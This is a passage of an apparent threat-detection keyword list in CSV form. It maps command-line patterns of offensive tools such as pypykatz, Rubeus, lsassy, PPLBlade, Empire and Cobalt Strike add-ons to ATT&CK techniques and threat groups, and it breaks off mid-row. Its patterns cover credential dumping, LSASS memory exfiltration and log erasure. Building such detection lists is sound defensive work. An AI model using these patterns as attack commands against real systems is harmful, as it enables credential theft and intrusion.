Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* dpapi credential *.json cred*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* dpapi masterkey /root/*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* dpapi minidump *.dmp*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* dpapi prekey nt *S-1-5-21*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* dpapi prekey password *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* dpapi prekey registry *.reg*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* dpapi securestring *.dat*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* dpipe.sh*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,t1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker,1,0,N/A,N/A,1,55,28,2023-06-14T23:25:46Z,2022-03-08T17:13:24Z -* --drag-and-drop*,offensive_tool_keyword,blackcat ransomware,BlackCat Ransomware behavior,T1486.001 - T1489 - T1490 - T1486,TA0011 - TA0010 - TA0012 - TA0007 - TA0040,blackcat ransomware,N/A,Ransomware,https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* DraytekScan*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -* drda-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* drda-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* DriverName *Xeroxxx*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --drop-drag-and-drop-target*,offensive_tool_keyword,blackcat ransomware,BlackCat Ransomware behavior,T1486.001 - T1489 - T1490 - T1486,TA0011 - TA0010 - TA0012 - TA0007 - TA0040,blackcat ransomware,N/A,Ransomware,https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* dropping source port zero packet from *,greyware_tool_keyword,dns,Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/ossec/ossec-hids/blob/master/etc/rules/named_rules.xml,1,0,greyware tool - risks of False positive !,N/A,10,4099,1019,2023-08-09T15:42:59Z,2013-09-17T17:07:58Z -* dump * /service:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* dump --bucket *--dump-dir*,offensive_tool_keyword,S3Scanner,Scan for open S3 buckets and dump the contents,T1583 - T1583.002 - T1114 - T1114.002,TA0010,N/A,N/A,Reconnaissance,https://github.com/sa7mon/S3Scanner,1,0,N/A,8,10,2221,366,2023-10-02T13:25:28Z,2017-06-19T22:14:21Z -* dump_memory64*,offensive_tool_keyword,cobaltstrike,Collection of beacon object files for use with Cobalt Strike to facilitate,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rookuu/BOFs,1,0,N/A,10,10,156,26,2021-02-11T10:48:12Z,2021-02-11T10:28:48Z -* --dump-adcs*,offensive_tool_keyword,krbrelayx,Kerberos unconstrained delegation abuse toolkit,T1558.003 - T1098,TA0004 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dirkjanm/krbrelayx,1,0,N/A,N/A,2,900,148,2023-09-07T20:11:36Z,2019-01-08T18:42:07Z -* -DumpCerts *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* -DumpCreds *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* dumper.ps1*,offensive_tool_keyword,PowershellKerberos,Some scripts to abuse kerberos using Powershell,T1558.003 - T1558.004 - T1059.001,TA0006 - TA0002,N/A,N/A,Exploitation Tools,https://github.com/MzHmO/PowershellKerberos,1,0,N/A,9,3,262,37,2023-07-27T09:53:47Z,2023-04-22T19:16:52Z -* --dump-gmsa*,offensive_tool_keyword,krbrelayx,Kerberos unconstrained delegation abuse toolkit,T1558.003 - T1098,TA0004 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dirkjanm/krbrelayx,1,0,N/A,N/A,2,900,148,2023-09-07T20:11:36Z,2019-01-08T18:42:07Z -* --dump-laps*,offensive_tool_keyword,krbrelayx,Kerberos unconstrained delegation abuse toolkit,T1558.003 - T1098,TA0004 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dirkjanm/krbrelayx,1,0,N/A,N/A,2,900,148,2023-09-07T20:11:36Z,2019-01-08T18:42:07Z -* --dumpmode network --network raw --ip * --port *,offensive_tool_keyword,PPLBlade,Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.,T1003.001 - T1027.004 - T1560.001 - T1039 - T1570,TA0006 - TA0005 - TA0010 - TA0003,N/A,N/A,Credential Access - Data Exfiltration,https://github.com/tastypepperoni/PPLBlade,1,0,N/A,10,4,324,36,2023-08-30T07:59:51Z,2023-08-29T19:36:04Z -* --dumpmode network --network smb *,offensive_tool_keyword,PPLBlade,Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.,T1003.001 - T1027.004 - T1560.001 - T1039 - T1570,TA0006 - TA0005 - TA0010 - TA0003,N/A,N/A,Credential Access - Data Exfiltration,https://github.com/tastypepperoni/PPLBlade,1,0,N/A,10,4,324,36,2023-08-30T07:59:51Z,2023-08-29T19:36:04Z -* --dump-name *lsass*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,0,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -* --dumpname lsass.dmp*,offensive_tool_keyword,PPLBlade,Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.,T1003.001 - T1027.004 - T1560.001 - T1039 - T1570,TA0006 - TA0005 - TA0010 - TA0003,N/A,N/A,Credential Access - Data Exfiltration,https://github.com/tastypepperoni/PPLBlade,1,0,N/A,10,4,324,36,2023-08-30T07:59:51Z,2023-08-29T19:36:04Z -* duplicates.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -e bat com vbs ps1 psd1 psm1 pem key rsa pub reg txt cfg conf config *,offensive_tool_keyword,MANSPIDER,Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!,T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083,TA0007 - TA0009 - TA0010,N/A,N/A,Discovery,https://github.com/blacklanternsecurity/MANSPIDER,1,0,N/A,8,8,772,119,2023-10-03T03:50:49Z,2020-03-18T13:27:20Z -* -e pfx p12 pkcs12 pem key crt cer csr jks keystore key keys der *,offensive_tool_keyword,MANSPIDER,Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!,T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083,TA0007 - TA0009 - TA0010,N/A,N/A,Discovery,https://github.com/blacklanternsecurity/MANSPIDER,1,0,N/A,8,8,772,119,2023-10-03T03:50:49Z,2020-03-18T13:27:20Z -* -e ppk rsa pem ssh rsa*,offensive_tool_keyword,MANSPIDER,Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!,T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083,TA0007 - TA0009 - TA0010,N/A,N/A,Discovery,https://github.com/blacklanternsecurity/MANSPIDER,1,0,N/A,8,8,772,119,2023-10-03T03:50:49Z,2020-03-18T13:27:20Z -* e2e_test.py*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* eap-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ebowla.py*,offensive_tool_keyword,Ebowla,Framework for Making Environmental Keyed Payloads,T1027.002 - T1059.003 - T1140,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/Genetic-Malware/Ebowla,1,0,N/A,10,8,710,179,2019-01-28T10:45:15Z,2016-04-07T22:29:58Z -* edge logindata *,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files (BOF) for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/crypt0p3g/bof-collection,1,0,N/A,10,10,151,25,2022-12-05T04:49:33Z,2021-01-20T06:07:38Z -* edge masterkey *,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files (BOF) for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/crypt0p3g/bof-collection,1,0,N/A,10,10,151,25,2022-12-05T04:49:33Z,2021-01-20T06:07:38Z -* edraser.py*,offensive_tool_keyword,EDRaser,EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.,T1070.004 - T1027 - T1564.001,TA0005 - TA0040 - TA0003,N/A,N/A,Defense Evasion,https://github.com/SafeBreach-Labs/EDRaser,1,1,N/A,10,2,118,16,2023-09-27T13:45:05Z,2023-08-10T04:30:45Z -* EfsPotato*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -* Egress-Assess's FTP server*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -* -ElevatedPersistenceOption *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Persistence.psm1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* emailall.py*,offensive_tool_keyword,EmailAll,EmailAll is a powerful Email Collect tool,T1114.001 - T1113 - T1087.003,TA0009 - TA0003,N/A,N/A,Reconnaissance,https://github.com/Taonn/EmailAll,1,0,N/A,6,6,577,101,2022-03-04T10:36:41Z,2022-02-14T06:55:30Z -* empire.arguments*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -* empire.client.*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -* empire.py*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -* empire_exec*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - 